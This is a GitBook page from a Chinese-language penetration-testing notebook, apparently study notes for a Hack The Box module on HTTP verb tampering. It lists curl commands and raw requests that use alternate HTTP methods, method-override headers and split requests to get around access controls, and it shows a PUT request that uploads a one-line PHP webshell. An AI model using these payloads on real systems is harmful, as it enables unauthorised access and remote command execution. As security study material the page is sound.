0xdfxyz
  • Penetration Testing Process
    • README.md
    • Whois
  • Nikto
  • Search Engine Discovery
  • FinalRecon
  • Nessus
  • 0_新手上路
    • 0_新手上路
  • 1_訊息收集
    • 服務枚舉
      • Page 6
      • Nmap
      • DNS
    • 應用枚舉
      • Page 6
    • A D枚舉
      • Page 6
    • web枚舉
      • Page 6
      • Web Fuzzing
      • Subdomain
  • 2_漏洞前準備
    • 反彈 Shell
    • 工具彙總
    • 字典生成
  • 3_漏洞利用
    • 應用漏洞利用
    • AD 攻擊
    • 二進位漏洞利用
    • Web漏洞利用
      • XSS
      • IDOR
      • Webshel​​l
      • File uploads
      • SSTI
      • LFI
      • SQL injection
      • XXE
      • HTTP Verb Tampering
      • Command Injection
    • 服務漏洞利用
      • CMS
        • Wordpress
        • Joolmla
        • Drupal
      • Servlet 容器/軟體開發
        • Jenkins
        • Tomcat
      • 基礎設施/網路監控工具
        • Splunk
        • PRTG Network Monitor
      • 客戶服務管理與配置管理
        • osTicket
        • Gitlab
      • 通用網關介面
        • 攻擊通用網關介面 (CGI) 應用程式 - Shellshock
      • 其他應用
        • ColdFusion
        • IIS Tilde
        • LDAP
      • 常見應用程式
        • Thick client(也稱為rich客戶端或fat客戶端
        • Web 批量分配漏洞 ( Ruby on Rails)
        • 攻擊連接到服務的應用程式(SSH)
  • 4_滲透
    • Linux 權限提升
    • Windows 權限提升
    • Windows + Linux 工具
  • 5_橫向移動
    • 工具
    • 跳板 Pivoting
    • AD 橫向移動
    • Linux 橫向移動
    • Windows 橫向移動
  • 6_NetExec
    • 常見模組
    • 命令執行
    • 漏洞掃描模組
    • 模組使用
    • 憑證轉儲
    • Kerberos 認證
    • LDAP RDP 枚舉
    • SMB 枚舉
由 GitBook 提供支持
在本页
  • 1. 發現點
  • 2. 測試Payload
  • 3. bypass技巧
  • 4. 濫用
  • 5.Skills Assessment

这有帮助吗?

  1. 3_漏洞利用
  2. Web漏洞利用

HTTP Verb Tampering

HTTP Verb Tampering(HTTP 動詞篡改)是一種 Web 安全漏洞,攻擊者透過變更 HTTP Method(如 GET、POST、PUT、DELETE)來繞過伺服器的訪問控制機制,進行未授權操作或敏感數據存取。

1. 發現點

  • 登入

  • 登記

  • 403 禁止

  • 禁止

2. 測試Payload

1️⃣ 嘗試不同 HTTP 動詞

常見測試:

# 測試是否能繞過身份驗證
curl -X GET http://target.com/admin
curl -X PUT http://target.com/admin
curl -X DELETE http://target.com/admin
​
# 測試 HEAD 是否會洩露敏感資訊
curl -X HEAD http://target.com/admin -i
​
# 利用 TRACE 進行 XST(跨站追蹤攻擊)
curl -X TRACE http://target.com/admin -i
​
# 測試 X-HTTP-Method-Override
curl -X POST http://target.com/admin -H "X-HTTP-Method-Override: DELETE"
GET /admin
POST /admin
PUT /admin
DELETE /admin
HEAD /admin
OPTIONS /admin
TRACE /admin

目的:檢測是否能繞過權限驗證或執行不該允許的操作。

2️⃣ 變形 HTTP 動詞

有些伺服器可能不嚴格檢查標準 HTTP 方法,可以測試變形動詞:

GETT /admin
POSTT /admin
X-HTTP-Method-Override: PUT

目的:測試是否能繞過黑名單或解析異常導致的安全漏洞。

3️⃣ X-HTTP-Method-Override

某些應用允許透過 X-HTTP-Method-Override 來覆寫 HTTP 方法:

POST /admin
X-HTTP-Method-Override: DELETE

目的:檢查應用是否支援此機制,並嘗試執行未授權操作。

4️⃣ X-Method-Override 及其他變形

某些應用可能允許不同標頭變種:

X-Method-Override: PUT
X-HTTP-Method: DELETE
X-Override-Method: PATCH

目的:檢測伺服器是否支援不同名稱的覆寫標頭。

3. bypass技巧

  • 混淆 HTTP 動詞

    • GET /admin HTTP/1.1\r\nPOST / HTTP/1.1

    • HEAD /admin (可能繞過日誌記錄)

  • 利用 OPTIONS

    OPTIONS /admin HTTP/1.1
    • 查看允許的 HTTP 方法,確認可用的攻擊向量。

  • 拆分請求

    GET /admin HTTP/1.1
    Host: target.com
    Content-Length: 0
    
    PUT /admin HTTP/1.1

    目的:測試是否能透過拆分請求繞過安全檢查。

  • 攔截請求篡改

    • 使用 Burp Suite 攔截請求,修改 HTTP 方法後轉發。

4. 濫用

🚀 進一步攻擊方向

  1. 利用 DELETE 或 PUT 進行數據破壞或上傳 Webshell

    curl -X PUT http://target.com/uploads/shell.php --data "<?php system($_GET['cmd']); ?>"
  2. 結合 IDOR(不安全的直接對象參照)漏洞

    • 測試 PUT /user/1234 是否可以修改其他用戶的數據。

  3. 利用 TRACE 進行 XST

    • 如果 TRACE 啟用,結合 JavaScript 嘗試竊取 HTTP Header(如 Cookie)。

5.Skills Assessment

上一页XXE下一页Command Injection

最后更新于2个月前

这有帮助吗?

https://academy.hackthebox.com/module/134/section/1219